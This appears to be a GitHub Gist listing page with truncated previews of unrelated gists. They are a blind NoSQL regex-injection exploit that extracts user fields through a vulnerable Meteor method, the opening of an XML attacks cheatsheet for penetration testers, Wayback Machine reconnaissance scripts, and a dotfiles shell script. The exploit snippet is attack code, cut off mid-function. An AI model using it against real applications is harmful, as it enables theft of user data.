@ojasookert
ojasookert / meteor-regex-blind-nosql.js
Created August 2, 2019 14:14
Exfiltrate data via vulnerable Meteor method
(function exploit(user, field, alphabet, data = '', index = 0) {
    Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
        console.log('^' + data + alphabet[index] + '.*', res);
        if (res == 0) {
            index++;
        } else {
            data += alphabet[index];
            index = 0;
        }
        if (index >= alphabet.length) {
@mgeeky
mgeeky / xml-attacks.md
Last active April 13, 2024 15:52
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may not be secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access local files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against an application will first have to determine which XML parser is in use, and then which of the attacks listed below that parser is vulnerable to.


import requests
import sys
import json
def waybackurls(host, with_subs):
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
#!/bin/sh
# Some things taken from here
# https://github.com/mathiasbynens/dotfiles/blob/master/.osx
# Set the colours you can use
black='\033[0;30m'
white='\033[0;37m'
red='\033[0;31m'
green='\033[0;32m'